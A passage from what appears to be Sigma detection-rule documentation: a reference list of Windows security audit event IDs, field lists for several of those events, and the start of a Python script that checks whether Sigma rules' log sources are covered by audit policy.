- [5062: A kernel-mode cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5062)
- [5063: A cryptographic provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5063)
- [5064: A cryptographic context operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5064)
- [5065: A cryptographic context modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5065)
- [5066: A cryptographic function operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5066)
- [5067: A cryptographic function modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5067)
- [5068: A cryptographic function provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5068)
- [5069: A cryptographic function property operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5069)
- [5070: A cryptographic function property modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5070)
- [5136: A directory service object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136)
- [5137: A directory service object was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5137)
- [5138: A directory service object was undeleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5138)
- [5139: A directory service object was moved.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5139)
- [5140: A network share object was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140)
- [5141: A directory service object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5141)
- [5142: A network share object was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5142)
- [5143: A network share object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5143)
- [5144: A network share object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5144)
- [5145: A network share object was checked to see whether client can be granted desired access.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145)
- [5148: The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5148)
- [5149: The DoS attack has subsided and normal processing is being resumed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5149)
- [5150: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5150)
- [5151: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5151)
- [5152: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152)
- [5153: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5153)
- [5154: The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5154)
- [5155: The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5155)
- [5156: The Windows Filtering Platform has permitted a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156)
- [5157: The Windows Filtering Platform has blocked a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157)
- [5158: The Windows Filtering Platform has permitted a bind to a local port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5158)
- [5159: The Windows Filtering Platform has blocked a bind to a local port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5159)
- [5168: SPN check for SMB/SMB2 failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5168)
- [5376: Credential Manager credentials were backed up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5376)
- [5377: Credential Manager credentials were restored from a backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5377)
- [5378: The requested credentials delegation was disallowed by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5378)
- [5440: The following callout was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5440)
- [5441: The following filter was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5441)
- [5442: The following provider was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5442)
- [5443: The following provider context was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5443)
- [5444: The following sub-layer was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5444)
- [5446: A Windows Filtering Platform callout has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5446)
- [5447: A Windows Filtering Platform filter has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5447)
- [5448: A Windows Filtering Platform provider has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5448)
- [5449: A Windows Filtering Platform provider context has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5449)
- [5450: A Windows Filtering Platform sub-layer has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5450)
- [5451: An IPsec Quick Mode security association was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5451)
- [5452: An IPsec Quick Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5452)
- [5453: An IPsec negotiation with a remote computer failed because the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5453)
- [5456: PAStore Engine applied Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5456)
- [5457: PAStore Engine failed to apply Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5457)
- [5458: PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5458)
- [5459: PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5459)
- [5460: PAStore Engine applied local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5460)
- [5461: PAStore Engine failed to apply local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5461)
- [5462: PAStore Engine failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5462)
- [5463: PAStore Engine polled for changes to the active IPsec policy and detected no changes.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5463)
- [5464: PAStore Engine polled for changes to the active IPsec policy, detected changes, and applied them to IPsec Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5464)
- [5465: PAStore Engine received a control for forced reloading of IPsec policy and processed the control successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5465)
- [5466: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5466)
- [5467: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5467)
- [5468: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5468)
- [5471: PAStore Engine loaded local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5471)
- [5472: PAStore Engine failed to load local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5472)
- [5473: PAStore Engine loaded directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5473)
- [5474: PAStore Engine failed to load directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5474)
- [5477: PAStore Engine failed to add quick mode filter.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5477)
- [5478: IPsec Services has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5478)
- 5479: IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.
- 5480: IPsec Services failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.
- 5483: IPsec Services failed to initialize RPC server. IPsec Services could not be started.
- 5484: IPsec Services has experienced a critical failure and has been shut down. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.
- 5485: IPsec Services failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.
- [5632: A request was made to authenticate to a wireless network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5632)
- [5633: A request was made to authenticate to a wired network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5633)
- [5712: A Remote Procedure Call (RPC) was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5712)
- [5888: An object in the COM+ Catalog was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5888)
- [5889: An object was deleted from the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5889)
- [5890: An object was added to the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5890)
- [6144: Security policy in the group policy objects has been applied successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6144)
- [6145: One or more errors occurred while processing security policy in the group policy objects.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6145)
- [6272: Network Policy Server granted access to a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6272)
- [6273: Network Policy Server denied access to a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6273)
- [6274: Network Policy Server discarded the request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6274)
- [6275: Network Policy Server discarded the accounting request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6275)
- [6276: Network Policy Server quarantined a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6276)
- [6277: Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6277)
- [6278: Network Policy Server granted full access to a user because the host met the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6278)
- [6279: Network Policy Server locked the user account due to repeated failed authentication attempts.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6279)
- [6280: Network Policy Server unlocked the user account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6280)
- [6281: Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6281)
- [6400: BranchCache: Received an incorrectly formatted response while discovering availability of content.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6400)
- [6401: BranchCache: Received invalid data from a peer. Data discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6401)
- [6402: BranchCache: The message to the hosted cache offering it data is incorrectly formatted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6402)
- [6403: BranchCache: The hosted cache sent an incorrectly formatted response to the client.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6403)
- [6404: BranchCache: Hosted cache could not be authenticated using the provisioned SSL certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6404)
- [6405: BranchCache: %2 instance(s) of event id %1 occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6405)
- [6406: %1 registered to Windows Firewall to control filtering for the following: %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6406)
- 6407: N/A
- [6408: Registered product %1 failed and Windows Firewall is now controlling the filtering for %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6408)
- [6409: BranchCache: A service connection point object could not be parsed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6409)
- [6410: Code integrity determined that a file does not meet the security requirements to load into a process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6410)
- [6416: A new external device was recognized by the System](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6416)
- [6419: A request was made to disable a device](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6419)
- [6420: A device was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6420)
- [6421: A request was made to enable a device.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6421)
- [6422: A device was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6422)
- [6423: The installation of this device is forbidden by system policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423)
- [6424: The installation of this device was allowed, after having previously been forbidden by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6424)
## Event Fields
### Provider: Microsoft Windows Security Auditing / EventID: 4624
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- LogonType
- LogonProcessName
- AuthenticationPackageName
- WorkstationName
- LogonGuid
- TransmittedServices
- LmPackageName
- KeyLength
- ProcessId
- ProcessName
- IpAddress
- IpPort
- ImpersonationLevel
- RestrictedAdminMode
- RemoteCredentialGuard
- TargetOutboundUserName
- TargetOutboundDomainName
- VirtualAccount
- TargetLinkedLogonId
- ElevatedToken
```
### Provider: Microsoft Windows Security Auditing / EventID: 4627
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- LogonType
- EventIdx
- EventCountTotal
- GroupMembership
```
### Provider: Microsoft Windows Security Auditing / EventID: 4663
Expand Details
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- ObjectServer
- ObjectType
- ObjectName
- HandleId
- AccessList
- AccessMask
- ProcessId
- ProcessName
- ResourceAttributes
```
### Provider: Microsoft Windows Security Auditing / EventID: 4670
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- ObjectServer
- ObjectType
- ObjectName
- HandleId
- OldSd
- NewSd
- ProcessId
- ProcessName
```
### Provider: Microsoft Windows Security Auditing / EventID: 4672
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- PrivilegeList
```
### Provider: Microsoft Windows Security Auditing / EventID: 4673
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- ObjectServer
- Service
- PrivilegeList
- ProcessId
- ProcessName
```
### Provider: Microsoft Windows Security Auditing / EventID: 4688
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- NewProcessId
- NewProcessName
- TokenElevationType
- ProcessId
- CommandLine
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- ParentProcessName
- MandatoryLabel
```
### Provider: Microsoft Windows Security Auditing / EventID: 4689
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- Status
- ProcessId
- ProcessName
```
### Provider: Microsoft Windows Security Auditing / EventID: 4702
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TaskName
- TaskContentNew
- ClientProcessStartKey
- ClientProcessId
- ParentProcessId
- RpcCallClientLocality
- FQDN
```
### Provider: Microsoft Windows Security Auditing / EventID: 4703
Expand
```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- ProcessName
- ProcessId
- EnabledPrivilegeList
- DisabledPrivilegeList
```
### Provider: Microsoft Windows Security Auditing / EventID: 4957
Expand
```yml
- RuleId
- RuleName
- RuleAttr
```
### Provider: Microsoft Windows Security Auditing / EventID: 5447
Expand
```yml
- ProcessId
- UserSid
- UserName
- ProviderKey
- ProviderName
- ChangeType
- FilterKey
- FilterName
- FilterType
- FilterId
- LayerKey
- LayerName
- LayerId
- Weight
- Conditions
- Action
- CalloutKey
- CalloutName
```
================================================
FILE: documentation/tools/sigma-logsource-checker.py
================================================
# Author: Nasreddine Bencherchali (@nas_bench) / Nextron Systems
__version__ = "0.1.0"
from time import sleep
import yaml
import os
import argparse
from colorama import init
from colorama import Fore
import collections
import xml.etree.ElementTree as ET
from collections import defaultdict
SECURITY_EVENT_ID_MAPPING = {
# Account Logon
"{0CCE923F-69AE-11D9-BED3-505054503030}": {"EventIDs": [4774, 4775, 4776, 4777], "Name": "Audit Credential Validation"},
"{0CCE9242-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4768, 4771, 4772], "Name": "Audit Kerberos Authentication Service"},
"{0CCE9240-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4769, 4770, 4773], "Name": "Audit Kerberos Service Ticket Operations"},
"{0CCE9241-69AE-11D9-BED3-505054503030}" : { "EventIDs": [], "Name": "Audit Other Account Logon Events"},
# Account Management
"{0CCE9239-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4783, 4784, 4785, 4786, 4787, 4788, 4789, 4790, 4791, 4792], "Name": "Audit Application Group Management"},
"{0CCE9236-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4741, 4742, 4743], "Name": "Audit Computer Account Management"},
"{0CCE9238-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4749, 4750, 4751, 4752, 4753], "Name": "Audit Distribution Group Management"},
"{0CCE923A-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4782, 4793], "Name": "Audit Other Account Management Events"},
"{0CCE9237-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4731, 4732, 4733, 4734, 4735, 4764, 4799, 4727, 4737, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758], "Name": "Audit Security Group Management"},
"{0CCE9235-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4765, 4766, 4767, 4780, 4781, 4794, 4798, 5376, 5377], "Name": "Audit User Account Management"},
# Detailed Tracking
"{0CCE922D-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4692, 4693, 4694, 4695], "Name": "Audit DPAPI Activity"},
"{0CCE9248-69AE-11D9-BED3-505054503030}" : { "EventIDs": [6416, 6419, 6420, 6421, 6422, 6423, 6424], "Name": "Audit PNP Activity"},
"{0CCE922B-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4688, 4696], "Name": "Audit Process Creation"},
"{0CCE922C-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4689], "Name": "Audit Process Termination"},
"{0CCE922E-69AE-11D9-BED3-505054503030}" : { "EventIDs": [5712], "Name": "Audit RPC Events"},
"{0CCE924A-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4703], "Name": "Audit Token Right Adjusted"},
# DS Access
"{0CCE923E-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4928, 4929, 4930, 4931, 4934, 4935, 4936, 4937], "Name": "Audit Detailed Directory Service Replication"},
"{0CCE923B-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4661, 4662], "Name": "Audit Directory Service Access"},
"{0CCE923C-69AE-11D9-BED3-505054503030}" : { "EventIDs": [5136, 5137, 5138, 5139, 5141], "Name": "Audit Directory Service Changes"},
"{0CCE923D-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4932, 4933], "Name": "Audit Directory Service Replication"},
# Logon/Logoff
"{0CCE9217-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4625], "Name": "Audit Account Lockout"},
"{0CCE9247-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4626], "Name": "Audit User/Device Claims"},
"{0CCE9249-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4627], "Name": "Audit Group Membership"},
"{0CCE921A-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4978, 4979, 4980, 4981, 4982, 4983, 4984], "Name": "Audit IPsec Extended Mode"},
"{0CCE9218-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4646, 4650, 4651, 4652, 4653, 4655, 4976, 5049, 5453], "Name": "Audit IPsec Main Mode"},
"{0CCE9219-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4977, 5451, 5452], "Name": "Audit IPsec Quick Mode"},
"{0CCE9216-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4634, 4647], "Name": "Audit Logoff"},
"{0CCE9215-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4624, 4625, 4648, 4675], "Name": "Audit Logon"},
"{0CCE9243-69AE-11D9-BED3-505054503030}" : { "EventIDs": [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280], "Name": "Audit Network Policy Server"},
"{0CCE921C-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4649, 4778, 4779, 4800, 4801, 4802, 4803, 5378, 5632, 5633], "Name": "Audit Other Logon/Logoff Events"},
"{0CCE921B-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4964, 4672], "Name": "Audit Special Logon"},
# Object Access
"{0CCE9222-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4665, 4666, 4667, 4668], "Name": "Audit Application Generated"},
"{0CCE9221-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4868, 4869, 4870, 4871, 4872, 4873, 4874, 4875, 4876, 4877, 4878, 4879, 4880, 4881, 4882, 4883, 4884, 4885, 4886, 4887, 4888, 4889, 4890, 4891, 4892, 4893, 4894, 4895, 4896, 4897, 4898], "Name": "Audit Certification Services"},
"{0CCE9244-69AE-11D9-BED3-505054503030}" : { "EventIDs": [5145], "Name": "Audit Detailed File Share"},
"{0CCE9224-69AE-11D9-BED3-505054503030}" : { "EventIDs": [5140, 5142, 5143, 5144, 5168], "Name": "Audit File Share"},
"{0CCE921D-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4656, 4658, 4660, 4663, 4664, 4670, 4985, 5051], "Name": "Audit File System"},
"{0CCE9226-69AE-11D9-BED3-505054503030}" : { "EventIDs": [5031, 5150, 5151, 5154, 5155, 5156, 5157, 5158, 5159], "Name": "Audit Filtering Platform Connection"},
"{0CCE9225-69AE-11D9-BED3-505054503030}" : { "EventIDs": [5152, 5153], "Name": "Audit Filtering Platform Packet Drop"},
"{0CCE9223-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4658, 4690], "Name": "Audit Handle Manipulation"},
"{0CCE921F-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4656, 4658, 4660, 4663], "Name": "Audit Kernel Object"},
"{0CCE9227-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4671, 4691, 4698, 4699, 4700, 4701, 4702, 5148 ,5149, 5888, 5889, 5890], "Name": "Audit Other Object Access Events"},
"{0CCE921E-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4656, 4657, 4658, 4660, 4663, 4670, 5039], "Name": "Audit Registry"},
"{0CCE9245-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4656, 4658, 4663], "Name": "Audit Removable Storage"},
"{0CCE9220-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4661], "Name": "Audit SAM"},
"{0CCE9246-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4818], "Name": "Audit Central Access Policy Staging"},
# Policy Change
"{0CCE922F-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4715, 4719, 4817, 4902, 4906, 4907, 4908, 4912, 4904, 4905], "Name": "Audit Audit Policy Change"},
"{0CCE9230-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4670, 4706, 4707, 4716, 4713, 4717, 4718, 4739, 4864, 4865, 4866, 4867], "Name": "Audit Authentication Policy Change"},
"{0CCE9231-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4703, 4704, 4705, 4670, 4911, 4913], "Name": "Audit Authorization Policy Change"},
"{0CCE9233-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4709, 4710, 4711, 4712, 5040, 5041, 5042, 5043, 5044, 5045, 5046, 5047, 5048, 5440, 5441, 5442, 5443, 5444, 5446, 5448, 5449, 5450, 5456, 5457, 5458, 5459, 5460, 5461, 5462, 5463, 5464, 5465, 5466, 5467, 5468, 5471, 5472, 5473, 5474, 5477], "Name": "Audit Filtering Platform Policy Change"},
"{0CCE9232-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4944, 4945, 4946, 4947, 4948, 4949, 4950, 4951, 4952, 4953, 4954, 4956, 4957, 4958], "Name": "Audit MPSSVC Rule-Level Policy Change"},
"{0CCE9234-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4714, 4819, 4826, 4909, 4910, 5063, 5064, 5065, 5066, 5067, 5068, 5069, 5070, 5447, 6144, 6145], "Name": "Audit Other Policy Change Events"},
# Privilege Use
"{0CCE9229-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4673, 4674, 4985], "Name": "Audit Non Sensitive Privilege Use"},
"{0CCE922A-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4985], "Name": "Audit Other Privilege Use Events"},
"{0CCE9228-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4673, 4674, 4985], "Name": "Audit Sensitive Privilege Use"},
# System
"{0CCE9213-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4960, 4961, 4962, 4963, 4965, 5478, 5479, 5480, 5483, 5484, 5485], "Name": "Audit IPsec Driver"},
"{0CCE9214-69AE-11D9-BED3-505054503030}" : { "EventIDs": [5024, 5025, 5027, 5028, 5029, 5030, 5032, 5033, 5034, 5035, 5037, 5058, 5059, 6400, 6401, 6402, 6403, 6404, 6405, 6406, 6407, 6408, 6409], "Name": "Audit Other System Events"},
"{0CCE9210-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4608, 4616, 4621], "Name": "Audit Security State Change"},
"{0CCE9211-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4610, 4611, 4614, 4622, 4697], "Name": "Audit Security System Extension"},
"{0CCE9212-69AE-11D9-BED3-505054503030}" : { "EventIDs": [4612, 4615, 4618, 4816, 5038, 5056, 5062, 5057, 5060, 5061, 6281, 6410], "Name": "Audit System Integrity"}
}
OTHER_EVENT_ID_MAPPING = {
'PowerShell Core': [
{'Turn on Module Logging': 'Disabled'},
{'Turn on PowerShell Script Block Logging': 'Disabled'},
{'Turn on PowerShell Transcription': 'Disabled'}
],
'System/Audit Process Creation': [
{'Include command line in process creation events': 'Disabled'}
],
'Windows Components/Windows PowerShell': [
{'Turn on Module Logging': 'Disabled'},
{'Turn on PowerShell Script Block Logging': 'Disabled'},
{'Turn on PowerShell Transcription': 'Disabled'}]
}
WINDOWS_SYSMON_PROCESS_CREATION_FIELDS = ["RuleName", "UtcTime", "ProcessGuid", "ProcessId", "Image", "FileVersion", "Description", "Product", "Company", "OriginalFileName", "CommandLine", "CurrentDirectory", "User", "LogonGuid", "LogonId", "TerminalSessionId", "IntegrityLevel", "Hashes", "ParentProcessGuid", "ParentProcessId", "ParentImage", "ParentCommandLine", "ParentUser"]
# A reduced set of unique fields that only available to Sysmon/1 - Used for testing
WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS = ["RuleName", "UtcTime", "ProcessGuid", "FileVersion", "Description", "Product", "Company", "OriginalFileName", "CurrentDirectory", "User", "LogonGuid", "LogonId", "TerminalSessionId", "IntegrityLevel", "Hashes", "ParentProcessGuid", "ParentProcessId", "ParentCommandLine", "ParentUser"]
WINDOWS_SECURITY_PROCESS_CREATION_FIELDS = ["SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine", "TargetUserSid", "TargetUserName", "TargetDomainName", "TargetLogonId", "ParentProcessName", "MandatoryLabel"]
# A reduced set of unique fields that only available to Security/4688 - Used for testing
WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS = ["SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "TargetUserSid", "TargetUserName", "TargetDomainName", "TargetLogonId", "ParentProcessName", "MandatoryLabel"]
def yield_next_rule_file_path(path_to_rules: str) -> str:
for root, _, files in os.walk(path_to_rules):
for file in files:
if file.endswith(".yml"):
yield os.path.join(root, file)
def get_rule_part(file_path: str, part_name: str):
yaml_dicts = get_rule_yaml(file_path)
for yaml_part in yaml_dicts:
if part_name in yaml_part.keys():
